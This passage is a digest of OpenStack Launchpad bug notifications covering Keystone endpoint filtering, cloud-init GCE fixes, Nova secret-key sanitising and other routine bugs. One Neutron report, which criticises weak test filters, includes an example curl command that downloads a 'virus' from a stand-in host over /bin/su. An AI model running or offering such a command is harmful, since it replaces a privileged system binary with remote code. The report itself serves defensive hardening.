"http://192.168.33.10:35357/v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6®ion=RegionTwo";,
 "previous": null, "next": null}}

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1482772/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487139] [NEW] We need more strict filters for functional tests

2015-08-20 Thread Sergey Belous
Public bug reported:

Currently, for example,  tee program not using in functional tests, but filter 
for it (very weak) are existing in functional-testing.filters . Also, in the 
current state of the curl filter allow to use curl to replace system files, 
like: curl -o /bin/su http://mycoolsite.in/my-virus-needs-suid
We need more strict filters setting for functional tests.

** Affects: neutron
 Importance: Undecided
 Assignee: Sergey Belous (sbelous)
 Status: New

** Changed in: neutron
 Assignee: (unassigned) => Sergey Belous (sbelous)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487139

Title:
  We need more strict filters for functional tests

Status in neutron:
  New

Bug description:
  Currently, for example,  tee program not using in functional tests, but 
filter for it (very weak) are existing in functional-testing.filters . Also, in 
the current state of the curl filter allow to use curl to replace system files, 
like: curl -o /bin/su http://mycoolsite.in/my-virus-needs-suid
  We need more strict filters setting for functional tests.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487139/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487140] [NEW] Remove _40_router.py.example

2015-08-20 Thread Abishek Subramanian
Public bug reported:

Given the "Router" dashboard has been moved out of master and into the
horizon-cisco-ui Repo, the _40_router.py.example file is no longer
necessary in master. Deleting this file.

** Affects: horizon
 Importance: Undecided
 Assignee: Abishek Subramanian (absubram)
 Status: In Progress

** Changed in: horizon
 Assignee: (unassigned) => Abishek Subramanian (absubram)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487140

Title:
  Remove _40_router.py.example

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  Given the "Router" dashboard has been moved out of master and into the
  horizon-cisco-ui Repo, the _40_router.py.example file is no longer
  necessary in master. Deleting this file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487140/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487038] Re: nova.exception._cleanse_dict should use oslo_utils.strutils._SANITIZE_KEYS

2015-08-20 Thread Matt Riedemann
Per comment 1, I assume the _cleanse_dict method would continue to
remove the keys.

** Also affects: oslo.messaging
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487038

Title:
  nova.exception._cleanse_dict should use
  oslo_utils.strutils._SANITIZE_KEYS

Status in OpenStack Compute (nova):
  Confirmed
Status in oslo.messaging:
  Confirmed

Bug description:
  The wrap_exception decorator in nova.exception uses the _cleanse_dict
  helper method to remove any keys from the args/kwargs list of the
  method that was called, but only checks those keys of the form *_pass:

  
http://git.openstack.org/cgit/openstack/nova/tree/nova/exception.py?id=12.0.0.0b2#n57

  def _cleanse_dict(original):
  """Strip all admin_password, new_pass, rescue_pass keys from a dict."""
  return {k: v for k, v in six.iteritems(original) if "_pass" not in k}

  The oslo_utils.strutils module has it's own list of keys to sanitized
  used in it's mask_password method:

  
http://git.openstack.org/cgit/openstack/oslo.utils/tree/oslo_utils/strutils.py#n54

  _SANITIZE_KEYS = ['adminPass', 'admin_pass', 'password', 'admin_password',
'auth_token', 'new_pass', 'auth_password', 'secret_uuid',
'sys_pswd']

  The nova code should probably be using some form of the same thing
  that strutils is using for mask_password, which uses a regex to find
  hits.  For example, if the arg was 'auth_token' or simply 'password',
  _cleanse_dict would fail to filter it out.

  You could also argue that the oslo.messaging log notifier should be
  using oslo_utils.strutils.mask_password before it logs the message -
  which isn't happening in that library today.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487038/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1470880] Re: [SRU] GCE datasource reports availability zones incorrectly

2015-08-20 Thread Chris J Arges
** Also affects: cloud-init (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1470880

Title:
  [SRU] GCE datasource reports availability zones incorrectly

Status in cloud-init:
  In Progress
Status in cloud-init package in Ubuntu:
  New

Bug description:
  [Impact]
  Availability zones and regions on GCE cannot be used for mirror substitution, 
making in-cloud mirrors impossible.

  [Test Case]
  Run the following Python code on trusty and later:

  from cloudinit.sources.DataSourceGCE import DataSourceGCE
  ds = DataSourceGCE({}, None, None)
  ds.get_data()
  ds.availability_zone

  Or the following code on precise:

  from cloudinit.DataSourceGCE import DataSourceGCE
  ds = DataSourceGCE({})
  ds.get_data()
  ds.get_availability_zone()

  and confirm that the availability zone is returned (rather than a
  relative URL).

  [Regression Potential]
  This is completely broken at the moment, so it can't get any more broken.

  [Original Report]
  After querying the cloud fabric, DataSourceGCE will return something along 
the lines of "projects/969378662406/zones/europe-west1-d" as its 
availability_zone.

  This means that other parts of the code that expect a sensible value
  for this (most notably the mirror discovery code), are broken on GCE.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1470880/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1470890] Re: [SRU] cc_apt_configure does not understand regions

2015-08-20 Thread Chris J Arges
** Package changed: ubuntu => cloud-init (Ubuntu)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1470890

Title:
  [SRU] cc_apt_configure does not understand regions

Status in cloud-init:
  In Progress
Status in cloud-init package in Ubuntu:
  New

Bug description:
  [Impact]
  In GCE, we want to deploy Ubuntu mirrors per-region.  At the moment, it is 
impossible to configure cloud-init to look for mirrors with the instance's 
region substituted in to the mirror DNS name.  This will allow us to do so, 
which will allow us to improve the experience for Ubuntu users on GCE, both in 
terms of mirror responsiveness and bandwidth costs.

  [Test Case]
  On GCE, specify a primary mirror search URL of 
"http://%(region)s.gce.clouds.archive.ubuntu.com/ubuntu/" and run cloud-init. 
When running 'apt-get update', you should see a mirror URL which matches the 
above with the instance's region substituted in.

  [Regression Potential]
  There are two existing substitutions for mirror strings: availability_zone 
and ec2_region.  We will need to ensure that each of these can still be used 
(testing specifically on EC2 for the latter).

  [Original Report]
  In _get_package_mirror_info (in cloudinit/distros/__init__.py), there is code 
that specifically handles converting EC2 availability zones to their 
corresponding regions. This won't work for other clouds that don't have the 
same form for availability zones (and even if they _do_, they'll have to be 
configured using strings containing 'ec2'; weird), which is problematic.

  This is particularly a problem for GCE.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1470890/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1470880] Re: [SRU] GCE datasource reports availability zones incorrectly

2015-08-20 Thread Chris J Arges
Hello Dan, or anyone else affected,

Accepted cloud-init into vivid-proposed. The package will build now and
be available at https://launchpad.net/ubuntu/+source/cloud-
init/0.7.7~bzr1091-0ubuntu5 in a few hours, and then in the -proposed
repository.

Please help us by testing this new package.  See
https://wiki.ubuntu.com/Testing/EnableProposed for documentation how to
enable and use -proposed.  Your feedback will aid us getting this update
out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug,
mentioning the version of the package you tested, and change the tag
from verification-needed to verification-done. If it does not fix the
bug for you, please add a comment stating that, and change the tag to
verification-failed.  In either case, details of your testing will help
us make a better decision.

Further information regarding the verification process can be found at
https://wiki.ubuntu.com/QATeam/PerformingSRUVerification .  Thank you in
advance!

** Also affects: cloud-init (Ubuntu Vivid)
   Importance: Undecided
   Status: New

** Also affects: cloud-init (Ubuntu Trusty)
   Importance: Undecided
   Status: New

** Also affects: cloud-init (Ubuntu Precise)
   Importance: Undecided
   Status: New

** Changed in: cloud-init (Ubuntu)
   Status: New => Fix Released

** Changed in: cloud-init (Ubuntu Vivid)
   Status: New => Fix Committed

** Tags added: verification-needed

** Changed in: cloud-init (Ubuntu Trusty)
   Status: New => Fix Committed

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1470880

Title:
  [SRU] GCE datasource reports availability zones incorrectly

Status in cloud-init:
  In Progress
Status in cloud-init package in Ubuntu:
  Fix Released
Status in cloud-init source package in Precise:
  Fix Committed
Status in cloud-init source package in Trusty:
  Fix Committed
Status in cloud-init source package in Vivid:
  Fix Committed

Bug description:
  [Impact]
  Availability zones and regions on GCE cannot be used for mirror substitution, 
making in-cloud mirrors impossible.

  [Test Case]
  Run the following Python code on trusty and later:

  from cloudinit.sources.DataSourceGCE import DataSourceGCE
  ds = DataSourceGCE({}, None, None)
  ds.get_data()
  ds.availability_zone

  Or the following code on precise:

  from cloudinit.DataSourceGCE import DataSourceGCE
  ds = DataSourceGCE({})
  ds.get_data()
  ds.get_availability_zone()

  and confirm that the availability zone is returned (rather than a
  relative URL).

  [Regression Potential]
  This is completely broken at the moment, so it can't get any more broken.

  [Original Report]
  After querying the cloud fabric, DataSourceGCE will return something along 
the lines of "projects/969378662406/zones/europe-west1-d" as its 
availability_zone.

  This means that other parts of the code that expect a sensible value
  for this (most notably the mirror discovery code), are broken on GCE.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1470880/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1470890] Re: [SRU] cc_apt_configure does not understand regions

2015-08-20 Thread Chris J Arges
Hello Dan, or anyone else affected,

Accepted cloud-init into vivid-proposed. The package will build now and
be available at https://launchpad.net/ubuntu/+source/cloud-
init/0.7.7~bzr1091-0ubuntu5 in a few hours, and then in the -proposed
repository.

Please help us by testing this new package.  See
https://wiki.ubuntu.com/Testing/EnableProposed for documentation how to
enable and use -proposed.  Your feedback will aid us getting this update
out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug,
mentioning the version of the package you tested, and change the tag
from verification-needed to verification-done. If it does not fix the
bug for you, please add a comment stating that, and change the tag to
verification-failed.  In either case, details of your testing will help
us make a better decision.

Further information regarding the verification process can be found at
https://wiki.ubuntu.com/QATeam/PerformingSRUVerification .  Thank you in
advance!

** Also affects: cloud-init (Ubuntu Precise)
   Importance: Undecided
   Status: New

** Also affects: cloud-init (Ubuntu Vivid)
   Importance: Undecided
   Status: New

** Also affects: cloud-init (Ubuntu Trusty)
   Importance: Undecided
   Status: New

** Changed in: cloud-init (Ubuntu)
   Status: New => Fix Released

** Changed in: cloud-init (Ubuntu Vivid)
   Status: New => Fix Committed

** Tags added: verification-needed

** Changed in: cloud-init (Ubuntu Trusty)
   Status: New => Fix Committed

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1470890

Title:
  [SRU] cc_apt_configure does not understand regions

Status in cloud-init:
  In Progress
Status in cloud-init package in Ubuntu:
  Fix Released
Status in cloud-init source package in Precise:
  Fix Committed
Status in cloud-init source package in Trusty:
  Fix Committed
Status in cloud-init source package in Vivid:
  Fix Committed

Bug description:
  [Impact]
  In GCE, we want to deploy Ubuntu mirrors per-region.  At the moment, it is 
impossible to configure cloud-init to look for mirrors with the instance's 
region substituted in to the mirror DNS name.  This will allow us to do so, 
which will allow us to improve the experience for Ubuntu users on GCE, both in 
terms of mirror responsiveness and bandwidth costs.

  [Test Case]
  On GCE, specify a primary mirror search URL of 
"http://%(region)s.gce.clouds.archive.ubuntu.com/ubuntu/" and run cloud-init. 
When running 'apt-get update', you should see a mirror URL which matches the 
above with the instance's region substituted in.

  [Regression Potential]
  There are two existing substitutions for mirror strings: availability_zone 
and ec2_region.  We will need to ensure that each of these can still be used 
(testing specifically on EC2 for the latter).

  [Original Report]
  In _get_package_mirror_info (in cloudinit/distros/__init__.py), there is code 
that specifically handles converting EC2 availability zones to their 
corresponding regions. This won't work for other clouds that don't have the 
same form for availability zones (and even if they _do_, they'll have to be 
configured using strings containing 'ec2'; weird), which is problematic.

  This is particularly a problem for GCE.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1470890/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487176] [NEW] `nova-manage db expand` fails in dry run mode

2015-08-20 Thread Brian Elliott
Public bug reported:

"nova-manage db expand --dry-run" will fail if the `locked` column has
never been added to the migrate_version table via a previous "live"
expand operation.

The following error results because the `locked` column doesn't exist:
http://paste.openstack.org/show/422748/

The DB should not be locked for an expand dry run.

** Affects: nova
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487176

Title:
  `nova-manage db expand` fails in dry run mode

Status in OpenStack Compute (nova):
  New

Bug description:
  "nova-manage db expand --dry-run" will fail if the `locked` column has
  never been added to the migrate_version table via a previous "live"
  expand operation.

  The following error results because the `locked` column doesn't exist:
  http://paste.openstack.org/show/422748/

  The DB should not be locked for an expand dry run.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487176/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487048] Re: logic error in metadata_to_dict utility function

2015-08-20 Thread Brian Rosmaita
I'm withdrawing this.  The filter_deleted flag should really be named
'include_deleted', and the logic around this is a bit convoluted.  Feel
free to read through the original gerrit reviews to see why this change
was made.

** Changed in: nova
   Status: New => Invalid

** Changed in: nova
 Assignee: Brian Rosmaita (brian-rosmaita) => (unassigned)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487048

Title:
  logic error in metadata_to_dict utility function

Status in OpenStack Compute (nova):
  Invalid

Bug description:
  Change b7e9a64416ff239a4c1b8501f398796b02c46ce7 introduces a
  filter_deleted flag into the metadata_to_dict function.  The way this
  flag is used at
  
https://github.com/openstack/nova/blob/a2d5492e8a15cdc13ada61b03f6293c709160505/nova/utils.py#L850
  however, has the effect that when filter_deleted is true, all instance
  system metadata will be returned in the dict even if such metadata is
  deleted, contrary to the purpose of the flag.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487048/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1472712] Re: [SRU] Using SSL with rabbitmq prevents communication between nova-compute and conductor after latest nova updates

2015-08-20 Thread Launchpad Bug Tracker
This bug was fixed in the package python-amqp - 1.3.3-1ubuntu1.1

---
python-amqp (1.3.3-1ubuntu1.1) trusty; urgency=medium

  * Ensure SSL read timeouts raised properly (LP: #1472712):
- d/p/dont-disconnect-transport-on-ssl-read-timeout.patch:
  Backport patch from 1.4.4.

 -- Edward Hope-Morley   Mon, 10 Aug
2015 15:57:44 +0100

** Changed in: python-amqp (Ubuntu Trusty)
   Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1472712

Title:
  [SRU] Using SSL with rabbitmq prevents communication between nova-
  compute and conductor after latest nova updates

Status in OpenStack Compute (nova):
  Invalid
Status in oslo.messaging:
  Invalid
Status in python-amqp package in Ubuntu:
  Fix Released
Status in python-amqp source package in Trusty:
  Fix Released

Bug description:
  [Impact]

  Current oslo.messaging and python-amqp results in repeated connection
  timeouts in the amqp transport layer (SSLError) and thus excessive
  reconnect attempts. This is a known issues that was fixed in python-
  amqp 1.4.4.

  [Test Case]

  Deploy openstack using current Trusty versions + this version of
  python-amqp + rabbitmq configured to allow ssl connections only. Once
  up and running, check the following:

   - number of rabbitmq connections - with single nova-compute,
  conductor etc I see approx 20 connections whereas previously i saw
  well over 100 and rising.

  sudo rabbitmqctl list_connections

  - check that messages are being consumed from openstack queues

  sudo rabbitmqctl list_queues -p openstack consumers messages name

  - also check e.g. nova-compute and nova-conductor logs and verify that
  the erros menioned below no longer appear

  [Regression Potential]

  None.

  [Other Info]

  None.

    - 

  On the latest update of the Ubuntu OpenStack packages, it was
  discovered that the nova-compute/nova-conductor
  (1:2014.1.4-0ubuntu2.1) packages encountered a bug with using SSL to
  connect to rabbitmq.

  When this problem occurs, the compute node cannot connect to the
  controller, and this message is constantly displayed:

  WARNING nova.conductor.api [req-4022395c-9501-47cf-bf8e-476e1cc58772
  None None] Timed out waiting for nova-conductor. Is it running? Or did
  this service start before nova-conductor?

  Investigation revealed that having rabbitmq configured with SSL was
  the root cause of this problem.  This seems to have been introduced
  with the current version of the nova packages.   Rabbitmq was not
  updated as part of this distribution update, but the messaging library
  (python-oslo.messaging 1.3.0-0ubuntu1.1) was updated.   So the problem
  could exist in any of these components.

  Versions installed:
  Openstack version: Icehouse
  Ubuntu 14.04.2 LTS
  nova-conductor1:2014.1.4-0ubuntu2.1
  nova-compute1:2014.1.4-0ubuntu2.1
  rabbitmq-server  3.2.4-1
  openssl:amd64/trusty-security   1.0.1f-1ubuntu2.15

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1472712/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1447215] Re: Schema Missing kernel_id, ramdisk_id causes #1447193

2015-08-20 Thread Launchpad Bug Tracker
This bug was fixed in the package glance - 1:2015.1.1-0ubuntu2

---
glance (1:2015.1.1-0ubuntu2) vivid; urgency=medium

  * Additional support for stable/kilo (LP: #1481008):
- d/p/fix-test-artifacts-plugin-loader.patch: Added to fix failing tests.
- d/p/skip-glance-search-tests.patch: Added to fix failing tests.
- d/p/skip-online-tests.patch: Added to skip tests that require online 
access
  during Ubuntu builds.

 -- Corey Bryant   Wed, 05 Aug 2015 17:53:11
-0400

** Changed in: glance (Ubuntu Vivid)
   Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1447215

Title:
  Schema Missing kernel_id, ramdisk_id causes #1447193

Status in Glance:
  Fix Released
Status in Glance kilo series:
  Fix Committed
Status in glance package in Ubuntu:
  In Progress
Status in glance source package in Vivid:
  Fix Released

Bug description:
  [Description]

  
  [Environment]

  - Ubuntu 14.04.2
  - OpenStack Kilo

  ii  glance   1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - Daemons
  ii  glance-api   1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - API
  ii  glance-common1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - Common
  ii  glance-registry  1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - Registry
  ii  python-glance1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - Python library
  ii  python-glance-store  0.4.0-0ubuntu1~cloud0all 
 OpenStack Image Service store library - Python 2.x
  ii  python-glanceclient  1:0.15.0-0ubuntu1~cloud0 all 
 Client library for Openstack glance server.

  [Steps to reproduce]

  0) Set /etc/glance/glance-api.conf to enable_v2_api=False
  1) nova boot --flavor m1.small --image base-image --key-name keypair 
--availability-zone nova --security-groups default snapshot-bug 
  2) nova image-create snapshot-bug snapshot-bug-instance 

  At this point the created image has no kernel_id (None) and image_id
  (None)

  3) Enable_v2_api=True in glance-api.conf and restart.

  4) Run a os-image-api=2 client,

  $ glance --os-image-api-version 2 image-list

  This will fail with #1447193

  [Description]

  The schema-image.json file needs to be modified to allow null, string
  values for both attributes.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1447215/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1199536] Re: Move dict test matchers into testtools

2015-08-20 Thread David Stanek
Keystone no longer maintains those matchers so there isn't anything to
fix anymore. The keystone/test/matcher.py module was removed in
https://review.openstack.org/#/c/154242/

** Changed in: keystone
   Status: Triaged => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1199536

Title:
  Move dict test matchers into testtools

Status in Ironic:
  Triaged
Status in Keystone:
  Invalid
Status in OpenStack Compute (nova):
  Won't Fix
Status in oslo-incubator:
  Won't Fix
Status in testtools:
  Incomplete
Status in Trove:
  Triaged

Bug description:
  Reduce code duplication by pulling DictKeysMismatch, DictMismatch and
  DictMatches from glanceclient/tests/matchers.py into a library (e.g.
  testtools)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ironic/+bug/1199536/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1418956] Re: Test utilities assume use of assignment api

2015-08-20 Thread David Stanek
We can reopen this if it becomes something bigger. Right now there's no
need and some debate about why drivers shouldn't implement the whole
API.

** Changed in: keystone
   Status: In Progress => Won't Fix

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1418956

Title:
  Test utilities assume use of assignment api

Status in Keystone:
  Won't Fix

Bug description:
  Our test fixtures and v3 test utils call the assignment API under the
  hood to create assignments. This is normally absolutely fine, although
  for developers looking to replace the assignments engine with their
  own, such APIs might fail. While a fuller solution would be to allow
  the disabling of all existing assignments tests, a simple thing we can
  do to let out-of-tree experimentation to at least use our test
  fixtures/utils is not to error out if the assignment APIs return
  NotImplemented.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1418956/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1471997] Re: nova MAX_FUNC value in nova/pci/devspec.py is too low

2015-08-20 Thread Chris Friesen
Jay Pipes helpfully pointed out that the MAX_FUNC value was defined by
the PCI spec, and didn't refer to the SRIOV VF value, but rather the PCI
device function.

The original issue turned out to be a local problem generating the PCI
whitelist.

** Changed in: nova
   Status: In Progress => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1471997

Title:
  nova MAX_FUNC value in nova/pci/devspec.py is too low

Status in OpenStack Compute (nova):
  Invalid

Bug description:
  The MAX_FUNC value in nova/pci/devspec.py is set to 0x7.  This limits
  us to a relatively small number of VFs per PF, which is annoying when
  trying to use SRIOV in any sort of serious way.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1471997/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1482772] Re: Region filtering for endpoints does not work

2015-08-20 Thread Lin Hua Cheng
OSC and KSC do already have the filter, however the filter it is passing
is "region" instead of "region_id".

There are still some work needed to change the filter name to region_id.

** Changed in: python-keystoneclient
   Status: Invalid => Confirmed

** Changed in: python-openstackclient
   Status: Invalid => Confirmed

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1482772

Title:
  Region filtering for endpoints does not work

Status in Keystone:
  In Progress
Status in python-keystoneclient:
  Confirmed
Status in python-openstackclient:
  Confirmed

Bug description:
  When i run “openstack endpoint list --os-url http://192.168.33.10:5000/v3 
--os-identity-api-version=3 --service identity --interface public --region 
RegionTwo” i would expect that it only lists endpoints from RegionTwo. But i 
get the identity endpoint from RegionOne. Here is the output:
  
+--+---+--+--+-+---++
  | ID   | Region| Service Name | Service Type 
| Enabled | Interface | URL|
  
+--+---+--+--+-+---++
  | 4b3efc615c044fb4a2c70ca2e5e7bba9 | RegionOne | keystone | identity 
| True| public| http://192.168.33.10:5000/v2.0 |
  
+--+---+--+--+-+---++

  As this snippet from the debug output from openstackclient shows, the
  client sends the correct query to keystone. So i assume this is a
  filtering problem in keystone.

  DEBUG: requests.packages.urllib3.connectionpool "GET 
/v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6®ion=RegionTwo
 HTTP/1.1" 200 506
  DEBUG: keystoneclient.session RESP: [200] content-length: 506 vary: 
X-Auth-Token keep-alive: timeout=5, max=96 server: Apache/2.4.7 (Ubuntu) 
connection: Keep-Alive date: Fri, 07 Aug 2015 19:37:08 GMT content-type: 
application/json x-openstack-request-id: 
req-72481573-7fff-4ae0-9a2f-33584b476bd3
  RESP BODY: {"endpoints": [{"region_id": "RegionOne", "links": {"self": 
"http://192.168.33.10:35357/v3/endpoints/4b3efc615c044fb4a2c70ca2e5e7bba9"}, 
"url": "http://192.168.33.10:5000/v2.0";, "region": "RegionOne", "enabled": 
true, "interface": "public", "service_id": "050872861656437184778a822032d8d6", 
"id": "4b3efc615c044fb4a2c70ca2e5e7bba9"}], "links": {"self": 
"http://192.168.33.10:35357/v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6®ion=RegionTwo";,
 "previous": null, "next": null}}

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1482772/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487251] [NEW] Creating new user does not require project

2015-08-20 Thread Thai Tran
Public bug reported:

When creating a new user, adding the user to a project is optional. The
REST api needs to respect this.

Reference:
https://github.com/openstack/horizon/blob/master/openstack_dashboard/api/rest/keystone.py#L91

** Affects: horizon
 Importance: Medium
 Assignee: Thai Tran (tqtran)
 Status: In Progress


** Tags: low-hanging-fruit

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487251

Title:
  Creating new user does not require project

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  When creating a new user, adding the user to a project is optional.
  The REST api needs to respect this.

  Reference:
  
https://github.com/openstack/horizon/blob/master/openstack_dashboard/api/rest/keystone.py#L91

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487251/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487254] [NEW] Get simple modal working again

2015-08-20 Thread Thai Tran
Public bug reported:

The simple-modal code was refactored and linted. It is now broken and
does not work properly.

** Affects: horizon
 Importance: Medium
 Assignee: Thai Tran (tqtran)
 Status: In Progress


** Tags: low-hanging-fruit

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487254

Title:
  Get simple modal working again

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  The simple-modal code was refactored and linted. It is now broken and
  does not work properly.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487254/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


